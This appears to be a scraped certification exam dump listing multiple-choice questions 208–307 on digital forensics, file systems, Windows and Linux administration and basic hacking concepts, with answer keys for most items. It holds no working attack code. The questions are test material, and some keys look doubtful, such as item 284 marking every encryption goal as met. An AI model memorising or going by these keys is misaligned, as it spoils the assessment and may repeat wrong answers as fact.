NEW QUESTION: 208 Which of the following statements best describes the consequences of the disaster recovery plan test? A. If no deficiencies were found during the test, then the test was probably flawed. B. The plan should not be changed no matter what the results of the test would be. C. The results of the test should be kept secret. D. If no deficiencies were found during the test, then the plan is probably perfect. Answer: (SHOW ANSWER)

NEW QUESTION: 209 Which of the following tools are used for footprinting? Each correct answer represents a complete solution. Choose all that apply. A. Sam spade B. Brutus C. Whois D. Traceroute Answer: A,C,D

NEW QUESTION: 210 John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. He enters the following command on the Linux terminal: 741 secure.c Considering the above scenario, which of the following statements are true? Each correct answer represents a complete solution. Choose all that apply. A. By the octal representation of the file access permission, John is restricting the group members to only read the secure.c file. B. John is providing all rights to the owner of the file. C. John is restricting a guest to only write or execute the secure.c file. D. The textual representation of the file access permission of 741 will be -rwxr--rw-. Answer: A,B

NEW QUESTION: 211 You work as a Network Administrator for Perfect Solutions Inc. The company has a Linux-based network. You are working as a root user on the Linux operating system. While performing some security investigation, you want to see the hostname and IP address from where users logged in. Which of the following commands will you use to accomplish the task? A. Last B. Dig C. Nslookup D. Netstat Answer: A

NEW QUESTION: 212 John works as a Network Administrator for Perfect Solutions Inc. The company has a Linux-based network. John is working as a root user on the Linux operating system. He wants to forward all the kernel messages to the remote host having IP address 192.168.0.1. Which of the following changes will he perform in the syslog.conf file to accomplish the task? A. !kern.* @192.168.0.1 B. !*.* @192.168.0.1 C. kern.* @192.168.0.1 D. *.* @192.168.0.1 Answer: (SHOW ANSWER)

NEW QUESTION: 213 Which of the following statutes, enacted in the U.S., prohibits creditors from collecting data from applicants, such as national origin, caste, religion, etc.? A. The Privacy Act B. The Electronic Communications Privacy Act C. The Equal Credit Opportunity Act (ECOA) D. The Fair Credit Reporting Act (FCRA) Answer: C

NEW QUESTION: 214 Which of the following types of virus makes changes to a file system of a disk? A. Stealth virus B. Master boot record virus C. Macro virus D. Cluster virus Answer: D

NEW QUESTION: 215 SIMULATION Fill in the blank with the appropriate name. _____ is a list, which specifies the order of volatility of data in a Windows-based system. Answer: RFC 3227

NEW QUESTION: 216 Which of the following tables is formed by NTFS file system to keep the track of files, to store metadata, and their location? A. The System File Table B. The File Allocation Table C. The Master Allocation Table D. The Master File Table Answer: D

NEW QUESTION: 217 You work as a Network Administrator for McNeel Inc. You want to encrypt each user's MY DOCUMENTS folder. You decide to use Encrypting File System (EFS). You plan to write a script for encryption. Which of the following tools will you use to encrypt specified folders? A. CIPHER B. Windows Explorer C. EFSINFO D. SYSKEY Answer: A

NEW QUESTION: 218 You work as a Network Administrator for Net World International. Rick, a Sales Manager, complains that his Windows 98 computer is not displaying the taskbar. You reboot his computer and find that the taskbar is still missing. How will you resolve the issue? A. Replace WIN.INI from backup. B. Reinstall Windows 98 on Rick's computer. C. Copy the registry from backup. D. Use Registry Editor to delete the following registry key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StuckRects Answer: D

NEW QUESTION: 219 Which of the following types of attacks cannot be prevented by technical measures only? A. Brute force B. Social engineering C. Smurf DoS D. Ping flood attack Answer: (SHOW ANSWER)

NEW QUESTION: 220 Sandra, a novice computer user, works in a Windows environment. She is experiencing a problem with bad sectors on a hard disk of her computer. She wants to run the CHKDSK command to check the hard disk for bad sectors and to fix any errors found. Which of the following switches will she use with the CHKDSK command to accomplish the task? A. CHKDSK /V /X B. CHKDSK /R /F C. CHKDSK /C /L D. CHKDSK /I Answer: B

NEW QUESTION: 221 HOTSPOT Identify the port in the image given below, which can be connected to the hub to extend the number of ports, and up to 127 devices can be connected to it? Hot Area:

Answer:

NEW QUESTION: 222 Adam works as a professional Penetration tester. A project has been assigned to him to employ penetration testing on the network of Umbrella Inc. He is running the test from home and had downloaded every security scanner from the Internet. Despite knowing the IP range of all of the systems, and the exact network configuration, Adam is unable to get any useful results. Which of the following is the most likely cause of this problem? Each correct answer represents a complete solution. Choose all that apply. A. Security scanners are only as smart as their database and cannot find unpublished vulnerabilities. B. Security scanners cannot perform vulnerability linkage. C. Security scanners are not designed to do testing through a firewall. D. Security scanners are smart as their database and can find unpublished vulnerabilities. Answer: A,B,C

NEW QUESTION: 223 Which of the following terms refers to a mechanism which proves that the sender really sent a particular message? A. Integrity B. Authentication C. Confidentiality D. Non-repudiation Answer: (SHOW ANSWER)

NEW QUESTION: 224 Which of the following is a nonvolatile form of memory that can be reprogrammed by using a special programming device, and need not be removed from the PC to be reprogrammed? A. EPROM B. PROM C. SRAM D. EEPROM E. DRAM Answer: D

NEW QUESTION: 225 Which of the following type of file systems is not supported by Linux kernel? A. NTFS B. FAT32 C. HFS D. vFAT Answer: (SHOW ANSWER)

NEW QUESTION: 226 Which of the following is described in the following statement? "It is a 512 bytes long boot sector that is the first sector of a default boot drive. It is also known as Volume Boot Sector, if the boot drive is un-partitioned." A. POST B. SBR C. BIOS D. MBR Answer: D

NEW QUESTION: 227 Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate the main server of SecureEnet Inc. The server runs on Debian Linux operating system. Adam wants to investigate and review the GRUB configuration file of the server system. Which of the following files will Adam investigate to accomplish the task? A. /boot/grub/menu.lst B. /boot/boot.conf C. /boot/grub/grub.conf D. /grub/grub.com Answer: A

NEW QUESTION: 228 You work as the Network Administrator for McNeil Inc. The company has a Unix-based network. You want to query an image root device and RAM disk size. Which of the following Unix commands can you use to accomplish the task? A. rdev B. setfdprm C. mount D. rdump Answer: A (LEAVE A REPLY)

NEW QUESTION: 229 John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He enters the following command on the Linux terminal: chmod -rwSr----- secure.c Considering the above scenario, which of the following statements is true? A. The Sticky bit is set, but other users have no execute permission. B. The Sticky bit is set and other users have the execute permission. C. The SGID bit is set, but the group execute permission is not set. D. The SUID bit is set, but the owner has no execute permission. Answer: (SHOW ANSWER)

NEW QUESTION: 230 Normally, RAM is used for temporary storage of data. But sometimes RAM data is stored in the hard disk, what is this method called? A. Cache memory B. Virtual memory C. Static memory D. Volatile memory Answer: B (LEAVE A REPLY)

NEW QUESTION: 231 Which of the following statements are NOT true about volume boot record or Master Boot Record? Each correct answer represents a complete solution. Choose all that apply. A. The end of MBR marker is h55CC. B. The actual program can be 512 bytes long. C. Four 16 bytes master partition records are present in MBR. D. Volume boot sector is present at cylinder 0, head 0, and sector 1 of the default boot drive. Answer: (SHOW ANSWER)

NEW QUESTION: 232 You work as a Network Administrator for Perfect Solutions Inc. You install Windows 98 on a computer. By default, which of the following folders does Windows 98 setup use to keep the registry tools? A. $SYSTEMROOT$WINDOWS B. $SYSTEMROOT$WINDOWSREGISTRY C. $SYSTEMROOT$REGISTRY D. $SYSTEMROOT$WINDOWSSYSTEM32 Answer: A (LEAVE A REPLY)

NEW QUESTION: 233 Which of the following uses hard disk drive space to provide extra memory for a computer? A. Virtual memory B. RAM C. Cluster D. File system Answer: A (LEAVE A REPLY)

NEW QUESTION: 234 Peter works as a Technical Representative in a CSIRT for SecureEnet Inc. His team is called to investigate the computer of an employee, who is suspected of classified data theft. The suspect's computer runs on the Windows operating system. Peter wants to collect data and evidence for further analysis. He knows that in the Windows operating system, the data is searched in pre-defined steps for proper and efficient analysis. Which of the following is the correct order for searching data on a Windows based system? A. Volatile data, file slack, registry, memory dumps, file system, system state backup, internet traces B. Volatile data, file slack, internet traces, registry, memory dumps, system state backup, file system C. Volatile data, file slack, registry, system state backup, internet traces, file system, memory dumps D. Volatile data, file slack, file system, registry, memory dumps, system state backup, internet traces Answer: D (LEAVE A REPLY)

NEW QUESTION: 235 Which of the following parameters is NOT used for calculating the capacity of the hard disk? A. Bytes per sector B. Number of heads C. Total number of sectors D. Number of platters Answer: (SHOW ANSWER)

NEW QUESTION: 236 Which of the following tools is used to extract human understandable interpretation from the computer binary files? A. Galleta B. FTK Imager C. Word Extractor D. FAU Answer: (SHOW ANSWER)

NEW QUESTION: 237 Which of the following files in LILO booting process of Linux operating system stores the location of Kernel on the hard drive? A. /sbin/lilo B. /boot/map C. /etc/lilo.conf D. /boot/boot.b Answer: B (LEAVE A REPLY)

NEW QUESTION: 238 Which of the following NIST RA process steps has the goal to identify the potential threat-sources and compile a threat statement listing the potential threat-sources that are applicable to the IT system being evaluated? A. Control Analysis B. Impact Analysis C. Vulnerability Identification D. Threat Identification Answer: D (LEAVE A REPLY)

NEW QUESTION: 239 You work as a Network Administrator for NetTech Inc. To ensure the security of files, you encrypt data files using Encrypting File System (EFS). You want to make a backup copy of the files and maintain security settings. You can backup the files either to a network share or a floppy disk. What will you do to accomplish this? A. Copy the files to a network share on a FAT32 volume. B. Copy the files to a floppy disk that has been formatted using Windows 2000 Professional. C. Copy the files to a network share on an NTFS volume. D. Place the files in an encrypted folder. Then, copy the folder to a floppy disk. Answer: C (LEAVE A REPLY)

NEW QUESTION: 240 You work as the Network Administrator for McNeil Inc. The company has a Unix-based network. You want to print the super block and block group information for the filesystem present on a system. Which of the following Unix commands can you use to accomplish the task? A. e2fsck B. dumpe2fs C. e2label D. dump Answer: (SHOW ANSWER)

NEW QUESTION: 241 Which of the following are the two different file formats in which Microsoft Outlook saves e-mail messages based on system configuration? Each correct answer represents a complete solution. Choose two. A. .txt B. .xst C. .pst D. .ost Answer: (SHOW ANSWER)

NEW QUESTION: 242 Which of the following is included in a memory dump file? A. Security ID B. Stop message and its parameters C. List of loaded drivers D. The kernel-mode call stack for the thread that stopped the process from execution Answer: B,C,D (LEAVE A REPLY)

NEW QUESTION: 243 Which of the following commands is used to create or delete partitions on Windows XP? A. fdisk B. DISKPART C. Part D. Active Answer: (SHOW ANSWER)

NEW QUESTION: 244 Mark works as a Network Administrator for Net Perfect Inc. The company has a Linux-based network. Mark installs a Checkpoint Firewall NGX on a SecurePlatform device. He performs a scheduled backup of his system settings and products configuration. Where are these backup files stored? Each correct answer represents a complete solution. Choose all that apply. A. Locally on the SecurePlatform machine hard drive B. SCP C. TFTP D. On a PC in a file named userC Answer: A,B,C (LEAVE A REPLY)

NEW QUESTION: 245 You work as a Network Administrator for Blue Well Inc. Your company's network has a Windows 2000 server with the FAT file system. This server stores sensitive data. You want to encrypt this data to protect it from unauthorized access. You also have to accomplish the following goals: Data should be encrypted and secure. Administrative effort should be minimum. You should have the ability to recover encrypted files in case the file owner leaves the company. Other permissions on encrypted files should be unaffected. File-level security is required on the disk where data is stored. Encryption or decryption of files should not be the responsibility of the file owner. You take the following steps to accomplish these goals: Convert the FAT file system to NTFS file system. Use third-party data encryption software. What will happen after taking these steps? Each correct answer represents a complete solution. Choose all that apply. A. Encryption or decryption of files will no longer be the responsibility of the file owner. B. Data will be encrypted and secure. C. Other permissions on encrypted files will remain unaffected. D. Administrative effort will be minimum. E. File-level security will be available on the disk where data is stored. Answer: B,C,E (LEAVE A REPLY)

NEW QUESTION: 246 You work as a Network Administrator for Net Perfect Inc. The company has a Windows Server 2008 network environment. The network is configured as a Windows Active Directory-based single forest single domain network. The network is configured on IP version 6 protocol. All the computers on the network are connected to a switch device. One day, users complain that they are unable to connect to a file server. You try to ping the client computers from the server, but the pinging fails. You try to ping the server's own loopback address, but it fails to ping. You restart the server, but the problem persists. What is the most likely cause? A. The server's NIC is not working. B. The switch device is not working. C. The cable that connects the server to the switch is broken. D. Automatic IP addressing is not working. E. The server is configured with unspecified IP address. Answer: A (LEAVE A REPLY)

NEW QUESTION: 247 Your friend plans to install a Trojan on your computer. He knows that if he gives you a new version of chess.exe, you will definitely install the game on your computer. He picks up a Trojan and joins it to chess.exe. The size of chess.exe was 526,895 bytes originally, and after joining this chess file to the Trojan, the file size increased to 651,823 bytes. When he gives you this new game, you install the infected chess.exe file on your computer. He now performs various malicious tasks on your computer remotely. But you suspect that someone has installed a Trojan on your computer and begin to investigate it. When you enter the netstat command in the command prompt, you get the following results: C:\WINDOWS>netstat -an | find "UDP" UDP IP_Address:31337 *:* Now you check the following registry address: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices In the above address, you notice a 'default' key in the 'Name' field having " .exe" value in the corresponding 'Data' field. Which of the following Trojans do you think your friend may have installed on your computer on the basis of the above evidence? A. Back Orifice B. Donald Dick C. Qaz D. Tini Answer: A (LEAVE A REPLY)

NEW QUESTION: 248 Sandra wants to create a full system state backup of her computer, which is running on Microsoft Windows XP operating system. Which of the following is saved in full state system backup? Each correct answer represents a complete solution. Choose all that apply. A. Active Directory (NTDS) B. Registry C. Windows boot files D. file system information Answer: A,B,C (LEAVE A REPLY)

NEW QUESTION: 249 Which of the following statements is NOT true about FAT16 file system? Each correct answer represents a complete solution. Choose all that apply. A. FAT16 file system works well with large disks because the cluster size increases as the disk partition size increases. B. FAT16 does not support file-level security. C. FAT16 file system supports Linux operating system. D. FAT16 file system supports file-level compression. Answer: (SHOW ANSWER)

NEW QUESTION: 250 Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him by the chief security officer of a cloth manufacturing company who suspects that one of the employees is selling the design of the clothes outside the company. The security officer asked Adam to investigate the iPhone of the employee, as he suspects that there might be some sensitive information stored in his iPhone. On investigation Adam found out that the employee tries to destroy the evidence on his iPhone. He presses and holds the Home and Power buttons until the device is forced into recovery mode. Which of the following actions occurred when iPhone is set into recovery mode? A. Data will be destroyed. B. Nothing will happen. C. iPhone will be prevented from booting temporarily. D. The file system will be destroyed. Answer: C (LEAVE A REPLY)

NEW QUESTION: 251 Which of the following is used to store configuration settings and options on Microsoft Windows operating systems? A. Group policy editor B. Windows setting C. Windows Config file D. Windows Registry Answer: (SHOW ANSWER)

NEW QUESTION: 252 Victor works as a professional Ethical Hacker for SecureNet Inc. He wants to use Steganographic file system method to encrypt and hide some secret information. Which of the following disk spaces will he use to store this secret information? Each correct answer represents a complete solution. Choose all that apply. A. Dumb space B. Hidden partition C. Unused Sectors D. Slack space Answer: B,C,D (LEAVE A REPLY)

NEW QUESTION: 253 Peter, an expert computer user, attached a new sound card to his computer. He then restarts the computer, so that the BIOS can scan the hardware changes. What is the memory range of ROM that the BIOS scans for additional code to be executed for proper working of the sound card? A. hCA79 to hAC20 B. hAA43 to hF345 C. hDF80 to hFF80 D. hC800 to hDF80 Answer: D (LEAVE A REPLY)

NEW QUESTION: 254 Which of the following file systems is designed by Sun Microsystems? A. ZFS B. ext2 C. NTFS D. CIFS Answer: A (LEAVE A REPLY)

NEW QUESTION: 255 Which of the following classes of hackers describes an individual who uses his computer knowledge for breaking security laws, invading privacy, and making information systems insecure? A. Black Hat B. White Hat C. Gray Hat D. Security providing organizations Answer: A (LEAVE A REPLY)

NEW QUESTION: 256 Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate and examine drive image of a compromised system, which is suspected to be used in cyber crime. Adam uses Forensic Sorter to sort the contents of hard drive in different categories. Which of the following type of image formats is NOT supported by Forensic Sorter? A. PFR image file B. RAW image file C. iso image file D. EnCase image file Answer: C (LEAVE A REPLY)

NEW QUESTION: 257 Which of the following directories cannot be placed out of the root filesystem? Each correct answer represents a complete solution. Choose all that apply. A. /lib B. /sbin C. /var D. /etc Answer: A,B,D (LEAVE A REPLY)

NEW QUESTION: 258 Which of the following hardware devices prevents broadcasts from crossing over subnets? A. Modem B. Router C. Bridge D. Hub Answer: (SHOW ANSWER)

NEW QUESTION: 259 Which of the following is a correct sequence of different layers of Open System Interconnection (OSI) model? A. Physical layer, network layer, transport layer, data link layer, session layer, presentation layer, and application layer B. Physical layer, data link layer, network layer, transport layer, presentation layer, session layer, and application layer C. Physical layer, data link layer, network layer, transport layer, session layer, presentation layer, and application layer D. application layer, presentation layer, network layer, transport layer, session layer, data link layer, and physical layer Answer: C (LEAVE A REPLY)

NEW QUESTION: 260 An executive in your company reports odd behavior on her PDA. After investigation you discover that a trusted device is actually copying data off the PDA. The executive tells you that the behavior started shortly after accepting an e-business card from an unknown person. What type of attack is this? A. PDA Hijacking B. Privilege Escalation C. Session Hijacking D. Bluesnarfing Answer: (SHOW ANSWER)

NEW QUESTION: 261 In which of the following access control models can a user not grant permissions to other users to see a copy of an object marked as secret that he has received, unless they have the appropriate permissions? A. Mandatory Access Control (MAC) B. Access Control List (ACL) C. Role Based Access Control (RBAC) D. Discretionary Access Control (DAC) Answer: A (LEAVE A REPLY)

NEW QUESTION: 262 Which of the following encryption methods uses AES technology? A. Static WEP B. TKIP C. Dynamic WEP D. CCMP Answer: (SHOW ANSWER)

NEW QUESTION: 263 Which of the following statements are true about Compact Disc (CD) and Digital Versatile Disk (DVD)? Each correct answer represents a complete solution. Choose all that apply. A. CDs and DVDs are not affected by X-rays, and other sources of electromagnetic radiation. B. Data is encoded in the form of tiny pits on the surface of the CD and DVD. C. CDs and DVDs are affected by EMP from nuclear detonations. D. It takes a small amount of energy to affect the data that is written on CD and DVD. Answer: B,D (LEAVE A REPLY)

NEW QUESTION: 264 Which of the following tools is an asterisk password revealer tool? A. SnadBoy B. Pwdump3 C. Aircrack D. Cain and Abel Answer: A (LEAVE A REPLY)

NEW QUESTION: 265 Which of the following is used for remote file access by UNIX/Linux systems? A. (SMB) B. Network File System (NFS) C. NetWare Core Protocol (NCP) D. Common Internet File System (CIFS) Answer: B (LEAVE A REPLY)

NEW QUESTION: 266 You work as a Network Security Analyzer. You got a suspicious email while working on a forensic project. Now, you want to know the IP address of the sender so that you can analyze various information such as the actual location, domain information, operating system being used, contact information, etc. of the email sender with the help of various tools and resources. You also want to check whether this email is fake or real. You know that analysis of email headers is a good starting point in such cases. The email header of the suspicious email is given below: What is the IP address of the sender of this email? A. 209.191.91.180 B. 172.16.10.90 C. 141.1.1.1 D. 216.168.54.25 Answer: D (LEAVE A REPLY)

NEW QUESTION: 267 Which of the following file attributes are not available on a FAT32 partition? Each correct answer represents a complete solution. Choose two. A. Compression B. Hidden C. Archive D. Read Only E. Encryption Answer: A,E (LEAVE A REPLY)

NEW QUESTION: 268 Which of the following components are usually found in an Intrusion detection system (IDS)? Each correct answer represents a complete solution. Choose two. A. Sensor B. Firewall C. Gateway D. Console E. Modem Answer: A,D (LEAVE A REPLY)

NEW QUESTION: 269 Joseph works as a Web Designer for WebTech Inc. He creates a Web site and wants to protect it from lawsuits. Which of the following steps will he take to accomplish the task? Each correct answer represents a part of the solution. Choose all that apply. A. Restrict the access to the site. B. Restrict shipping in certain areas. C. Restrict the transfer of information. D. Restrict customers according to their locations. Answer: A,B,D (LEAVE A REPLY)

NEW QUESTION: 270 Adam works as a professional Computer Hacking Forensic Investigator. He has been called by the FBI to examine data of the hard disk, which is seized from the house of a suspected terrorist. Adam decided to acquire an image of the suspected hard drive. He uses a forensic hardware tool, which is capable of capturing data from IDE, Serial ATA, SCSI devices, and flash cards. This tool can also produce MD5 and CRC32 hash while capturing the data. Which of the following tools is Adam using? A. FireWire DriveDock B. ImageMASSter 4002i C. Wipe MASSter D. ImageMASSter Solo-3 Answer: (SHOW ANSWER)

NEW QUESTION: 271 Which of the following is the process of comparing cryptographic hash functions of system executables and configuration files? A. Spoofing B. File integrity auditing C. Reconnaissance D. Shoulder surfing Answer: (SHOW ANSWER)

NEW QUESTION: 272 Nathan works as a professional Ethical Hacker. He wants to see all open TCP/IP and UDP ports of his computer. Nathan uses the netstat command for this purpose but he is still unable to map open ports to the running process with PID, process name, and path. Which of the following commands will Nathan use to accomplish the task? A. Pslist B. Psloggedon C. ping D. fport Answer: D (LEAVE A REPLY)

NEW QUESTION: 273 Victor is a novice Ethical Hacker. He is learning the hacking process, i.e., the steps taken by malicious hackers to perform hacking. Which of the following steps is NOT included in the hacking process? A. Reconnaissance B. Scanning C. Preparation D. gaining access Answer: C (LEAVE A REPLY)

NEW QUESTION: 274 Which of the following types of evidence is considered as the best evidence? A. Information gathered through the witness's senses B. A copy of the original document C. A computer-generated record D. The original document Answer: D (LEAVE A REPLY)

NEW QUESTION: 275 Which of the following statements about an extended partition are true? Each correct answer represents a complete solution. Choose two. A. A maximum of four extended partitions can exist on a single basic disk. B. It cannot contain more than one logical drive. C. It can be sub-divided into logical drives. D. It cannot be formatted or assigned a drive letter. Answer: (SHOW ANSWER)

NEW QUESTION: 276 Which of the following file systems are supported by Windows 2000 operating systems? Each correct answer represents a complete solution. Choose all that apply. A. NTFS4 B. CDFS C. HPFS D. FAT32 E. NTFS5 Answer: A,B,D,E (LEAVE A REPLY)

NEW QUESTION: 277 Brutus is a password cracking tool that can be used to crack the following authentications: HTTP (Basic Authentication) HTTP (HTML Form/CGI) POP3 (Post Office Protocol v3) FTP (File Transfer Protocol) SMB (Server Message Block) Telnet Which of the following attacks can be performed by Brutus for password cracking? Each correct answer represents a complete solution. Choose all that apply. A. Hybrid attack B. Brute force attack C. Dictionary attack D. Replay attack E. Man-in-the-middle attack Answer: A,B,C (LEAVE A REPLY)

NEW QUESTION: 278 Which of the following directories in Linux operating system contains device files, which refers to physical devices? A. /bin B. /dev C. /etc D. /boot Answer: (SHOW ANSWER)

NEW QUESTION: 279 Adam, a malicious hacker, hides a hacking tool from a system administrator of his company by using Alternate Data Streams (ADS) feature. Which of the following statements is true in context with the above scenario? A. Alternate Data Streams is a feature of Linux operating system. B. Adam is using FAT file system. C. Adam is using NTFS file system. D. Adam's system runs on Microsoft Windows 98 operating system. Answer: C (LEAVE A REPLY)

NEW QUESTION: 280 Which of the following standard file formats is used by Apple's iPod to store contact information? A. HFS+ B. vCard C. hCard D. FAT32 Answer: (SHOW ANSWER)

NEW QUESTION: 281 Which of the following Incident handling process phases is responsible for defining rules, collaborating human workforce, creating a back-up plan, and testing the plans for an enterprise? A. Recovery phase B. Preparation phase C. Eradication phase D. Containment phase E. Identification phase Answer: B (LEAVE A REPLY)

NEW QUESTION: 282 Which of the following tools is used to restore deleted files from Linux and Mac OS X file system? A. Easy-Undelete B. Active@ UNERASER C. Active@ UNDELETE D. R-Undelete Answer: A (LEAVE A REPLY)

NEW QUESTION: 283 John works as a Technical Support Executive in ABC Inc. The company's network consists of ten computers with Windows XP professional installed on all of them. John is working with a computer on which he has enabled hibernation. He shuts down his computer using hibernation mode. Which of the following will happen to the data after powering off the system using hibernation? A. Data will be stored on the ROM. B. Data will be saved before the system is switched off if you have configured hibernation to save data. C. Data will be saved automatically before the system is switched off. D. Unsaved data will be lost when hibernation switches off the system. Answer: C (LEAVE A REPLY)

NEW QUESTION: 284 Your network has a Windows 2000 Server computer with FAT file system, shared by several users. This system stores sensitive data. You decide to encrypt this data to protect it from unauthorized access. You want to accomplish the following goals: Data should be secure and encrypted. Administrative efforts should be minimum. You should have the ability to recover encrypted files in case the file owner leaves the company. Other permissions on encrypted files should be unaffected. File-level security is required on the disk where data is stored. Encrypting or decrypting of files should not be the responsibility of the file owner. You take the following steps to accomplish these goals: Convert the FAT file system to Windows 2000 NTFS file system. Use Encrypting File System (EFS) to encrypt data. Which of the following goals will you be able to accomplish? Each correct answer represents a complete solution. Choose all that apply. A. File-level security is available on the disk where data is stored. B. You have the ability to recover encrypted files in case the file owner leaves the company. C. Data are secured and encrypted. D. Administrative efforts are minimum. E. Encrypting or decrypting of files is no longer the responsibility of the file owner. F. Other permissions on encrypted files are unaffected. Answer: A,B,C,D,E,F (LEAVE A REPLY)

NEW QUESTION: 285 You work as a professional Computer Hacking Forensic Investigator for DataEnet Inc. You want to investigate e-mail information of an employee of the company. The suspected employee is using an online e-mail system such as Hotmail or Yahoo. Which of the following folders on the local computer will you review to accomplish the task? Each correct answer represents a complete solution. Choose all that apply. A. History folder B. Cookies folder C. Temporary Internet Folder D. Download folder Answer: A,B,C (LEAVE A REPLY)

NEW QUESTION: 286 Peter works as a Computer Hacking Forensic Investigator for SecureEnet Inc. He has been assigned with a project of investigating a disloyal employee who is accused of stealing secret data from the company and selling it to the competitor company. Peter is required to collect proper evidences and information to present before the court for prosecution. Which of the following parameters is necessary for successful prosecution of this corporate espionage? A. To prove that the information has a value. B. To submit investigative report to senior officials. C. To present the evidences before the court. D. To prove that the data belongs to the company. Answer: A (LEAVE A REPLY)

NEW QUESTION: 287 You work as a Computer Hacking Forensic Investigator for SecureNet Inc. You want to investigate a Cross-Site Scripting attack on your company's Website. Which of the following methods of investigation can you use to accomplish the task? Each correct answer represents a complete solution. Choose all that apply. A. Use a Web proxy to view the Web server transactions in real time and investigate any communication with outside servers. B. Review the source of any HTML-formatted e-mail messages for embedded scripts or links in the URL to the company's site. C. Look at the Web servers logs and normal traffic logging. D. Use Wireshark to capture traffic going to the server and then searching for the requests going to the input page, which may give log of the malicious traffic and the IP address of the source. Answer: A,B,C (LEAVE A REPLY)

NEW QUESTION: 288 Adam works as a Security Analyst for Umbrella Inc. He suspects that a virus exists in the network of the company. He scanned the client system with latest signature-based anti-virus, but no productive results have been obtained. Adam suspects that a polymorphic virus exists in the network. Which of the following statements are true about the polymorphic virus? Each correct answer represents a complete solution. Choose all that apply. A. It has the ability to mutate and can change its known viral signature and hide from signature based antivirus programs. B. The new virus resides in the main memory of the computer and does not infect other files of the operating system. C. When the user runs the infected file in the disk, it loads virus into the RAM. D. The mutation engine of polymorphic virus generates a new encrypted code, this changes the signature of the virus. Answer: A,C,D (LEAVE A REPLY)

NEW QUESTION: 289 Which of the following anti-child pornography organizations helps local communities to create programs and develop strategies to investigate child exploitation? A. Innocent Images National Initiative (IINI) B. Project Safe Childhood (PSC) C. Internet Crimes Against Children (ICAC) D. Anti-Child Porn.org Answer: B (LEAVE A REPLY)

NEW QUESTION: 290 You are reviewing a Service Level Agreement between your company and a Web development vendor. Which of the following are security requirements you should look for in this SLA? Each correct answer represents a complete solution. Choose all that apply. A. Security Monitoring B. Time to respond to bug reports C. Encryption standards D. Guarantees on known security flaws Answer: A,B,C,D (LEAVE A REPLY)

NEW QUESTION: 291 Which of the following is used to back up forensic evidences or data folders from the network or locally attached hard disk drives? A. WinHex B. FAR system C. Vedit D. Device Seizure Answer: (SHOW ANSWER)

NEW QUESTION: 292 Which of the following are known as the three laws of OPSEC? Each correct answer represents a part of the solution. Choose three. A. If you are not protecting it (the critical and sensitive information), the adversary wins! B. If you don't know what to protect, how do you know you are protecting it? C. If you don't know about your security resources you cannot protect your network. D. If you don't know the threat, how do you know what to protect? Answer: A,B,D (LEAVE A REPLY)

NEW QUESTION: 293 Which of the following tools is used to locate lost files and partitions to restore data from a formatted, damaged, or lost partition in Windows and Apple Macintosh computers? A. File Scavenger B. Recover4all Professional C. Easy-Undelete D. VirtualLab Answer: (SHOW ANSWER)

NEW QUESTION: 294 Which of the following is the Windows feature on which the file management can be performed by a PC user? A. Finder B. Windows Explorer C. Task Manager D. Activity Monitor Answer: (SHOW ANSWER)

NEW QUESTION: 295 What is the name of the Secondary IDE slave, fourth partition in Linux operating system according to the Linux naming convention? A. SDB3 B. HDD4 C. HDA4 D. HDC4 Answer: B (LEAVE A REPLY)

NEW QUESTION: 296 Which of the following command line tools are available in Helix Live acquisition tool on Windows? Each correct answer represents a complete solution. Choose all that apply. A. ipconfig B. whois C. .cab extractors D. netstat Answer: A,C,D (LEAVE A REPLY)

NEW QUESTION: 297 Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate and examine files present on a suspect's computer. Adam uses a tool with the help of which he can examine recovered deleted files, fragmented files, and other corrupted data. He can also examine the data, which was captured from the network, and access the physical RAM, and any processes running in virtual memory with the help of this tool. Which of the following tools is Adam using? A. HxD B. WinHex C. Vedit D. Evidor Answer: B (LEAVE A REPLY)

NEW QUESTION: 298 You work as a Network Administrator for uCertify Inc. You want to edit the MSDOS.SYS file on your computer from the DOS prompt. You are unable to find the file. What is the most likely cause? A. It is a read-only file. B. Someone has deleted the file. C. It is a hidden file. D. It is a built-in command in the COMMAND.COM file. Answer: C

NEW QUESTION: 299 John works as a Network Administrator for Perfect Solutions Inc. The company has a Linux-based network. John is working as a root user on the Linux operating system. Which of the following commands will John use to display information about all mounted file systems? Each correct answer represents a complete solution. Choose all that apply. A. df B. df -m C. ls D. du Answer: A,B

NEW QUESTION: 300 Which of the following types of computers is used for attracting potential intruders? A. Bastion host B. Files pot C. Honey pot D. Data pot Answer: (SHOW ANSWER)

NEW QUESTION: 301 Which of the following directories contains administrative commands on a UNIX computer? A. /bin B. /usr/local C. /sbin D. /export Answer: (SHOW ANSWER)


NEW QUESTION: 302 Adrian, the Network Administrator for Peach Tree Inc., wants to install a new computer on the company's network. He asks his assistant to make a boot disk with minimum files. The boot disk will be used to boot the computer, which does not have an operating system installed yet. Which of the following files will he include on the disk? A. IO.SYS, MSDOS.SYS, COMMAND.COM, and FDISK. B. IO.SYS, MSDOS.SYS, COMMAND.COM, and AUTOEXEC.BAT. C. IO.SYS, MSDOS.SYS, COMMAND.COM, and CONFIG.SYS. D. IO.SYS, MSDOS.SYS, and COMMAND.COM. Answer: D

NEW QUESTION: 303 Which of the following layers' protocols handle file transfer and network management? A. Transport B. Session C. Presentation D. Application Answer: D

NEW QUESTION: 304 You are handling technical support calls for an insurance company. A user calls you complaining that he cannot open a file, and that the file name appears in green while opening in Windows Explorer. What does this mean? A. The file belongs to another user. B. The file is infected with virus. C. The file is encrypted. D. The file is compressed. Answer: C

NEW QUESTION: 305 An organization monitors the hard disks of its employees' computers from time to time. Which policy does this pertain to? A. Privacy policy B. User password policy C. Backup policy D. Network security policy Answer: A

NEW QUESTION: 306 Which of the following registry hives stores information about the file extensions that are mapped to their corresponding applications? A. HKEY_LOCAL_MACHINE B. HKEY_CURRENT_USER C. HKEY_USERS D. HKEY_CLASSES_ROOT Answer: D

NEW QUESTION: 307 Which of the following fsck commands will you use to check all filesystems listed in /etc/fstab? A. fsck -f B. fsck -P C. fsck -A D. fsck -y Answer: C

